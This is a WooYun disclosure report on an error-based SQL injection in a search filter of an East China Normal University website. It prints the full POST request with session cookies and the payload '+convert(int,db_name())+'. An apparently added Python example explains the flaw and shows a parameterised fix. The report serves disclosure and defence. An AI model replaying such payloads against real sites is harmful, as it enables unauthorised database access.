Vulnerability summary

Defect ID: wooyun-2015-0152373

Title: An error-based SQL injection on a site of East China Normal University

Affected vendor: East China Normal University (华东师范大学)

Author: 路人甲

Submitted: 2015-11-06 18:17

Fixed: 2015-12-23 14:02

Published: 2015-12-23 14:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-11-06: Details sent to the vendor, awaiting the vendor's handling
2015-11-08: Vendor confirmed; details visible to the vendor only
2015-11-18: Details disclosed to core white hats and domain experts
2015-11-28: Details disclosed to regular white hats
2015-12-08: Details disclosed to intern white hats
2015-12-23: Details disclosed to the public

Brief description:

Detailed description:

http://www.qinzhu.ecnu.edu.cn/

POST /WebForm/DownloadFile/ HTTP/1.1
Content-Length: 6372
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=lgbd3pf105qrwwcskpwmpelr; __AntiXsrfToken=4a12357944cf4600a06874353bbe5321; __RequestVerificationToken=JuKD-0s6X8X2VbIotD9FgLc0cTCrAh8A1s557WA4pD4oT-nEikMFPbHTFC5SQdBehFNNq8iZsdcIL0TZuL1hekVLFegPBr8wqOXhqbW5TvQ1
Host: www.qinzhu.ecnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24ContentPlaceHolder1%24FilterButton=%e7%ad%9b%e9%80%89&ctl00%24ContentPlaceHolder1%24DateTimeCreatedTextBox='%2bconvert(int,db_name())%2b'&ctl00%24ContentPlaceHolder1%24TitleTextBox=Mr.&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=Phfco6ibajJfOgk9juoB0unt1GeNtU4RuPK8L4wEcer/niRYnS0IyfoHb6A%2b2mH4uBYYq47DrBhtD4SbYfGfVaD59y8Cjbm4Vn0o3lc80nLjDwEwiDD0/045/kTbJeNqXsXtH3tWq5odHgzN%2bBh2JukBfbn/sVTSJXryhy9nNZMDCKwpjoRgYWSwV/%2bYoWu6%2bHlJQuP9HiqUEWyx//VxiQ%3d%3d&__VIEWSTATE=DZ8ZX3n5bmlA%2beuR7Eky2SlayxA40TLNbxOYQxcCjFzvPtsFmTRxzD8LGYhrlyoJ7OceSMAotdf8gyMLP9fSiGJGpvs8zOHd%2bvIpip29Akzw02cjq8Cxt5qBQqcDQLoci8%2b/fwe/9HR0/lQr3Txw6AmF5OuOhoeFivoGGfSuQP9zQSGKrSMIYHT801S/liD5QOVfuiXpHiLKOvTH9w4RXjwhPssXfE%2bDQaH5oTEqO7bCNYRdRpNYNDR7J0AA5XXhIga2bdNjDG2StmdJJyq2DUEl55xBL8CKEF5sEfyiEoLxjwyoYy4kATUD%2b/AtJBIe76D%2bPfEKDAoGqkOxdmlrI1uYQx3AK%2bo9wSSDjh4DFcqb0UN5%2beccG9yJVODvtxTiIGX96Fs6IC/PWNvRXvIuNuLmUkt1kAdi1dKgDOB/WSAhtAJa3ZOSgXjBaK%2bvalKWDklmAK%2bbQJe8R/2dLq5hlzfi6SbRxajA/%2bE3Pf26zslrV1GjzkwC%2bhuzEgxjlNWPPrsQEpUJ0VEOGwrUSUSDVY3X08lOh6e%2bry57s9FPBuleA%2bB8iDYZR/TTmJdHNAvDK7RHQ5qyC2osOqD42ZddKzzrrDc3QAFzC6ErkmLqCVvwHNEbXebpjwGD%2b9QfF07JcP4gVqIxiAK/vQW/6AXPMLDMSl5k5bbAAoHjwJYjpCExk4kR2UGHihmGQnFJKeDXV5OQMFFkw%2bQL7qItmZTx%2bWiBIOEJfUUucG%2bmqF/Hwl1bAEDJ5eLO6xZKAKfw/RG9dTzbiYPhOiIUEfsIYgso9M06Ngt98jTuVHGE1X26gJbaFCE6IRtGK/MNPvOdH1HAfcvgyi2hOGOBJo%2bDmEv7qwqNwJe9Bg5R/VPYBmtr4ay91%2bcE/GyLIrtNOvvnFiNHnNvA4f1m8iKH08TZV9DZxULXwh6bh6T8Ah9g8uJbTunN9Gw7yvdsMbTCb5RgO0Dmtf1XRuUuxTat3Z%2bXb7QD8HJuHswf3Nb3L3MNQBjxilGzjOSt0zSFAzxvcsEaIM7qHmlkui1vZ5DwbSQPcDyPjbolxT%2bmpXvCzFX8MEvw88qo2fE9oGVUjy/ju%2bXWWTPH8qBGGH3cDfxBcnIveWHEC/6I5eUPxXb7uQsX0nUBdmxRh9%2bFZrAmPHvaceWyG6dJ0Zf04VyAgaPmklnkdfXBVFrE65%2bQnwBq%2bChBvMtKDzS2dbtrZHjQmtlehS3ISqZZSTsmB9hgkTepLgg8JyJpggYyEicufyJqUSnVjIwSZ5WNFRuMBOyGS/t/5rc4tqNXRvXzZ122saSdFK2Ca%2bJMp0UOrmwY2EvU6aaUKKY%2bvsEBoDUnR0pdeIGzebk2hdRt2bVh72pqBXtsrrHogZpBWgi4o0gVmbswC4itr/Aahc/cZjcCVbJhNVdn5GzZaGfKVnK%2bDm8O/s%2bnlq5oZ%2bFMhL4kFKprBT0GI1%2bd2VG2u1Zg
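The request above shows the shape of the bug: the DateTimeCreatedTextBox filter value is spliced into a query as text, so the quote in '+convert(int,db_name())+' closes the literal and the forced int conversion raises an error that leaks the database name. The following Python is an added example, not code from the report or from the affected site; it assumes the field is meant to hold an ISO date and contrasts the concatenated query with a validated, parameter-bound one (table and column names are hypothetical).

```python
"""Server-side handling of the DateTimeCreatedTextBox filter field."""
from datetime import datetime
from urllib.parse import parse_qs

# Constructed excerpt of the POST body in the report (ViewState dropped).
SAMPLE_BODY = (
    "ctl00%24ContentPlaceHolder1%24FilterButton=%e7%ad%9b%e9%80%89"
    "&ctl00%24ContentPlaceHolder1%24DateTimeCreatedTextBox="
    "'%2bconvert(int,db_name())%2b'"
    "&ctl00%24ContentPlaceHolder1%24TitleTextBox=Mr."
)
# Form field name as it arrives after URL decoding (%24 -> $).
DATE_FIELD = "ctl00$ContentPlaceHolder1$DateTimeCreatedTextBox"


def get_field(body: str, name: str) -> str:
    """Return the URL-decoded value of one form field ('' if absent)."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]


def build_filter_sql_vulnerable(created: str) -> str:
    """String concatenation: the pattern behind this report.

    The payload's leading quote closes the literal, and convert(int, ...)
    on a non-numeric string makes SQL Server raise an error whose message
    carries the value (here the database name) back to the client."""
    return "SELECT * FROM Files WHERE DateTimeCreated = '" + created + "'"


def build_filter_sql_safe(created: str):
    """Validate as an ISO date, then bind it with an ODBC-style '?' placeholder.

    Raises ValueError for anything that is not a date, so the payload is
    rejected before any SQL is built; the value never becomes query text."""
    parsed = datetime.strptime(created, "%Y-%m-%d")
    return ("SELECT * FROM Files WHERE DateTimeCreated = ?", (parsed,))


def filter_request(body: str):
    """Run the safe path for one POST body: (accepted, sql, params)."""
    value = get_field(body, DATE_FIELD)
    try:
        sql, params = build_filter_sql_safe(value)
    except ValueError:
        return (False, None, ())
    return (True, sql, params)
```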

[screenshot: 11.png]

[screenshot: 22.png]

[screenshot: 33.png]

Proof of vulnerability:

Remediation:

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-11-08 14:01

Vendor reply:

Notified the responsible second-level unit to handle it.

Latest status:

None yet